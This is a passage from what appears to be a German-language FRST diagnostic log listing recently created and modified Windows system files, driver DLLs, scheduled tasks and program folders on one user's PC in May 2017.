C:\WINDOWS\system32\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-05-07 18:11 - 2017-05-07 18:11 - 00000000 ____D C:\Windows.old 2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild 2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 
____D C:\WINDOWS\ServiceProfiles 2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2017-05-07 17:23 - 2017-05-17 21:27 - 01963832 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml 2017-05-07 17:17 - 2017-05-17 21:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2 2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater 2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} 2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} 2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} 2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS 2017-05-07 17:17 - 
2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician 2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared 2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino 2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten 2017-05-07 17:13 - 2017-05-17 21:20 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin 2017-05-07 17:13 - 
2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-10 21:46 - 00351440 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew 2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini 2017-05-19 14:18 - 2016-12-17 13:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Games 2017-05-19 14:18 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla 2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2017-05-19 13:51 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent 2017-05-19 13:51 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive 2017-05-18 22:50 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam 2017-05-18 21:09 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps 2017-05-18 21:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness 2017-05-17 21:27 - 2017-03-20 06:41 - 00862082 _____ C:\WINDOWS\system32\perfh007.dat 2017-05-17 21:27 - 2017-03-20 06:41 - 00179772 _____ C:\WINDOWS\system32\perfc007.dat 2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2017-05-17 21:20 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI 2017-05-17 21:20 - 2017-02-05 21:38 - 00013346 _____ C:\bdlog.txt 2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD 2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe 
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe 2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) 
C:\WINDOWS\SysWOW64\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) 
C:\WINDOWS\SysWOW64\amfrt32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\SysWOW64\atimpc32.dll 2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed 2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages 2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat 2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-05-07 18:11 - 
2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning 2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI 2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll 2017-05-07 18:09 
- 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll 2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration 2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate 2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat 2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular 2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-05-07 17:16 - 2017-03-14 00:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2 2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017 2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017 2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia 2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016 2017-05-07 
17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™ 2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin 2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker 2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung 2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader 2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II 2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net 2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo 2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician 2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod 2017-05-07 17:14 - 2017-01-29 17:53 